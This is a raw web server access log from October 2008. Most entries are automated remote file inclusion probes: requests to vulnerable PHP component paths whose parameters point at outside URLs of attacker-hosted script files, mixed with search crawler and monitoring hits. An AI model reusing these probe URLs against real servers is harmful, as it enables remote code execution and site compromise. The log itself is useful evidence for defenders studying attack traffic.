66.244.233.121 - - [03/Oct/2008:00:24:53 -0400] "GET /logs/access_log.Q108090200/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
74.6.17.176 - - [03/Oct/2008:00:24:53 -0400] "GET /logs/access_log.Q108040500 HTTP/1.0" 200 1126103 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.139.226 - - [03/Oct/2008:00:26:09 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:26:09 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:26:10 -0400] "GET /logs/access_log.Q108071700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:26:12 -0400] "GET /logs/access_log.Q108071500/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
75.125.146.130 - - [03/Oct/2008:00:26:51 -0400] "GET /logs/access_log.Q108091500/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
209.59.12.99 - - [03/Oct/2008:00:27:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.9.3.130 - - [03/Oct/2008:00:30:12 -0400] "GET /logs/access_log.Q108081600//My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:30:12 -0400] "GET //My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:30:12 -0400] "GET /logs//My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
65.55.213.109 - - [03/Oct/2008:00:30:15 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
76.9.3.130 - - [03/Oct/2008:00:30:20 -0400] "GET /logs/access_log.Q108061700//My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
74.6.17.176 - - [03/Oct/2008:00:29:15 -0400] "GET /logs/access_log.Q107080100 HTTP/1.0" 200 3135651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.114 - - [03/Oct/2008:00:30:29 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.114 - - [03/Oct/2008:00:30:29 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.213.109 - - [03/Oct/2008:00:30:15 -0400] "GET /logs/access_log.Q108081600 HTTP/1.0" 200 2568783 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
66.11.230.32 - - [03/Oct/2008:00:31:15 -0400] "GET /logs/access_log.Q108082200//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.11.230.32 - - [03/Oct/2008:00:31:15 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
91.192.241.74 - - [03/Oct/2008:00:31:16 -0400] "GET /logs/access_log.Q108082200//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
91.192.241.74 - - [03/Oct/2008:00:31:16 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.11.230.32 - - [03/Oct/2008:00:31:19 -0400] "GET /logs/access_log.Q108082200//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.11.230.32 - - [03/Oct/2008:00:31:19 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
151.1.24.160 - - [03/Oct/2008:00:31:36 -0400] "GET /logs/access_log.Q108091200//include/write.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:31:37 -0400] "GET //include/write.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:31:37 -0400] "GET /logs//include/write.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
85.124.248.147 - - [03/Oct/2008:00:31:39 -0400] "GET //My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:00:31:39 -0400] "GET /logs//My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:00:31:39 -0400] "GET /logs/access_log.Q108081600//My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
66.249.67.114 - - [03/Oct/2008:00:30:29 -0400] "GET /images/ACE_tutor_1Stage_Ridge.pdf HTTP/1.1" 200 1610345 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.52.139.226 - - [03/Oct/2008:00:31:55 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:31:55 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
91.192.241.74 - - [03/Oct/2008:00:31:56 -0400] "GET /logs/access_log.Q108072300//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.124.248.147 - - [03/Oct/2008:00:31:57 -0400] "GET /logs/access_log.Q108061700//My_eGallery/index.php?basepath=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
74.52.139.226 - - [03/Oct/2008:00:32:08 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
66.11.230.32 - - [03/Oct/2008:00:32:21 -0400] "GET /logs/access_log.Q108072300//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.11.230.32 - - [03/Oct/2008:00:32:23 -0400] "GET /logs/access_log.Q108072300//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.52.139.226 - - [03/Oct/2008:00:32:32 -0400] "GET /logs/error_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
151.1.24.160 - - [03/Oct/2008:00:32:46 -0400] "GET /logs/access_log.Q108091200//include/write.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:32:54 -0400] "GET //include/write.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
209.59.12.99 - - [03/Oct/2008:00:32:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.52.139.226 - - [03/Oct/2008:00:32:58 -0400] "GET /logs/access_log.Q108082400%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 264 "-" "libwww-perl/5.810"
151.1.24.160 - - [03/Oct/2008:00:33:03 -0400] "GET /logs//include/write.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
74.52.139.226 - - [03/Oct/2008:00:33:17 -0400] "GET /logs/error_log.Q108082400%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
74.6.17.176 - - [03/Oct/2008:00:33:21 -0400] "GET /images/_notes/home_welcome_bkgrd.gif.mno HTTP/1.0" 200 249 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.192.241.74 - - [03/Oct/2008:00:33:35 -0400] "GET /logs/error_log.Q108082200//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.64"
91.192.241.74 - - [03/Oct/2008:00:33:36 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.64"
91.192.241.74 - - [03/Oct/2008:00:33:36 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.64"
91.192.241.74 - - [03/Oct/2008:00:33:40 -0400] "GET /logs/access_log.Q108090600//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.64"
151.1.24.160 - - [03/Oct/2008:00:34:27 -0400] "GET /logs/error_log.Q108091200//include/write.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:35:35 -0400] "GET /logs/error_log.Q108091200//include/write.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:29 -0400] "GET /logs/error_log.Q108082200//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:29 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:29 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:33 -0400] "GET /logs/access_log.Q108090600//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:38 -0400] "GET /logs/error_log.Q108082200//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:38 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:38 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:00:37:45 -0400] "GET /logs/access_log.Q108090600//e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
209.59.12.99 - - [03/Oct/2008:00:37:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.1.24.160 - - [03/Oct/2008:00:39:05 -0400] "GET /logs/error_log.Q108090400//skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:39:06 -0400] "GET //skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:39:06 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:39:16 -0400] "GET /logs/error_log.Q108090400//skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:39:17 -0400] "GET //skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:39:17 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:40:31 -0400] "GET /logs/error_log.Q108080100//skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:00:40:44 -0400] "GET /logs/error_log.Q108080100//skin/zero_vote/error.php?dir=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
66.244.233.121 - - [03/Oct/2008:00:41:15 -0400] "GET /logs/access_log.Q108082200/?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.244.233.121 - - [03/Oct/2008:00:41:15 -0400] "GET /?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
66.244.233.121 - - [03/Oct/2008:00:41:15 -0400] "GET /logs/access_log.Q108082100/?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.244.233.121 - - [03/Oct/2008:00:41:14 -0400] "GET /logs/?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 200 68150 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Oct/2008:00:42:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.159.111.131 - - [03/Oct/2008:00:43:03 -0400] "GET //e404.php?INCLUDE_FOLDER=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:00:43:03 -0400] "GET /logs/access_log.Q108082200//e404.php?INCLUDE_FOLDER=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:00:43:03 -0400] "GET /logs/access_log.Q108072300//e404.php?INCLUDE_FOLDER=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:00:43:03 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
74.52.139.226 - - [03/Oct/2008:00:43:06 -0400] "GET /logs/access_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:43:06 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:43:06 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:43:22 -0400] "GET /logs/access_log.Q108091900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
74.6.17.176 - - [03/Oct/2008:00:45:15 -0400] "GET /logs/access_log.Q108071300 HTTP/1.0" 200 743450 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.127.68 - - [03/Oct/2008:00:47:16 -0400] "GET /logs//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:47:16 -0400] "GET //galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:47:17 -0400] "GET /logs/error_log.Q108082200//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:47:17 -0400] "GET /logs/error_log.Q108092600//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
75.125.146.130 - - [03/Oct/2008:00:47:38 -0400] "GET //galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 210 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:47:38 -0400] "GET /logs//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 215 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:47:38 -0400] "GET /logs/error_log.Q108082200//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:47:40 -0400] "GET /logs/error_log.Q108092600//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.61 [en] (OS/2; U)"
209.59.12.99 - - [03/Oct/2008:00:47:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.176 - - [03/Oct/2008:00:48:39 -0400] "GET /logs/error_log.Q108050500 HTTP/1.0" 200 206531 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.93.194 - - [03/Oct/2008:00:49:01 -0400] "GET /logs/access_log.Q108081500/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
72.29.93.194 - - [03/Oct/2008:00:49:01 -0400] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
72.29.93.194 - - [03/Oct/2008:00:49:01 -0400] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
205.205.28.133 - - [03/Oct/2008:00:49:11 -0400] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://escortreview.com/mambots/editors-xtd/WS_FTP.LOG/bo.do??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
205.205.28.133 - - [03/Oct/2008:00:49:11 -0400] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://escortreview.com/mambots/editors-xtd/WS_FTP.LOG/bo.do??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
205.205.28.133 - - [03/Oct/2008:00:49:11 -0400] "GET /logs/access_log.Q108081500/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://escortreview.com/mambots/editors-xtd/WS_FTP.LOG/bo.do??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
72.29.93.194 - - [03/Oct/2008:00:49:12 -0400] "GET /logs/access_log.Q108052600/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
205.205.28.133 - - [03/Oct/2008:00:49:32 -0400] "GET /logs/access_log.Q108052600/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://escortreview.com/mambots/editors-xtd/WS_FTP.LOG/bo.do??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
200.155.18.50 - - [03/Oct/2008:00:50:00 -0400] "GET /logs/access_log.Q108081500/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
200.155.18.50 - - [03/Oct/2008:00:50:00 -0400] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
200.155.18.50 - - [03/Oct/2008:00:50:00 -0400] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
200.155.18.50 - - [03/Oct/2008:00:50:29 -0400] "GET /logs/access_log.Q108052600/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ctg.su/files/bodo.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
91.192.241.74 - - [03/Oct/2008:00:51:53 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.64"
75.125.146.130 - - [03/Oct/2008:00:51:57 -0400] "GET /logs/error_log.Q108092400//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.61 [en] (OS/2; U)"
74.53.127.68 - - [03/Oct/2008:00:52:12 -0400] "GET /logs/error_log.Q108092400//galeria.php?start=0&kategoria=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
209.59.12.99 - - [03/Oct/2008:00:52:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.97.227.50 - - [03/Oct/2008:00:53:35 -0400] "GET /logs/error_log.Q108092600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.814"
216.97.227.50 - - [03/Oct/2008:00:53:35 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.814"
216.97.227.50 - - [03/Oct/2008:00:53:35 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.814"
74.52.139.226 - - [03/Oct/2008:00:53:42 -0400] "GET /logs/access_log.Q108082700%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 278 "-" "libwww-perl/5.810"
65.254.44.210 - - [03/Oct/2008:00:53:42 -0400] "GET /logs/error_log.Q108092600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
65.254.44.210 - - [03/Oct/2008:00:53:42 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
65.254.44.210 - - [03/Oct/2008:00:53:43 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
58.227.192.80 - - [03/Oct/2008:00:54:52 -0400] "GET //?_zb_path=http://www.woong-ji.co.kr/bbs/bot.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
58.227.192.80 - - [03/Oct/2008:00:54:52 -0400] "GET /logs//?_zb_path=http://www.woong-ji.co.kr/bbs/bot.txt?? HTTP/1.1" 200 68155 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.254.44.210 - - [03/Oct/2008:00:55:28 -0400] "GET /logs/access_log.Q108092200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
65.254.44.210 - - [03/Oct/2008:00:55:45 -0400] "GET /logs/access_log.Q108060700/?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.811"
65.254.44.210 - - [03/Oct/2008:00:55:45 -0400] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.811"
65.254.44.210 - - [03/Oct/2008:00:55:45 -0400] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 68150 "-" "libwww-perl/5.811"
216.97.227.50 - - [03/Oct/2008:00:55:50 -0400] "GET /logs/access_log.Q108092200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.814"
216.97.227.50 - - [03/Oct/2008:00:55:58 -0400] "GET /logs/access_log.Q108060700/?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.814"
216.97.227.50 - - [03/Oct/2008:00:55:58 -0400] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.814"
216.97.227.50 - - [03/Oct/2008:00:55:58 -0400] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 68150 "-" "libwww-perl/5.814"
64.72.112.110 - - [03/Oct/2008:00:56:24 -0400] "GET /logs/error_log.Q108092600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.800"
